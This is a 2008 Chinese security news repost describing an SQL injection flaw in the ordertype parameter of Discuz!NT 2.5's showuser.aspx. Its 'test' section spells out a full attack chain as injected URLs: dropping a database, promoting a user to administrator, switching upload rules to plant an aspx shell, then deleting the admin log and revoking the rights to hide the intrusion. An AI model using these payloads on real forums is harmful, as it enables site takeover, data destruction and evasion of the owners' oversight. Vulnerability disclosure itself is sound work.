Discuz!NT 2.5爆注入漏洞 可获取管理权限
点击次数:29 次 发布日期:2008-11-20 22:08:29 作者:源代码网
|
源代码网推荐源代码网整理以下
| 核心提示:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。 |
源代码网整理以下中国站长站(Chinaz.com)讯:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
源代码网整理以下漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
源代码网整理以下Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
源代码网整理以下漏洞厂商:http://www.comsenz.com
源代码网整理以下漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。
源代码网整理以下漏洞测试:
源代码网整理以下
|
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid="1",groupid="1" where username="webtets";--//更新为管理员
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension="aspx" where extension="jpg";-- //更新为aspx可上传
源代码网整理以下得到SHELL后...
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension="jpg" where extension="aspx";-- //更新回JPG
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username="webtets";-- //删除日志
源代码网整理以下http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid="",groupid="" where username="webtets";--//取消管理员
|
源代码网供稿. |
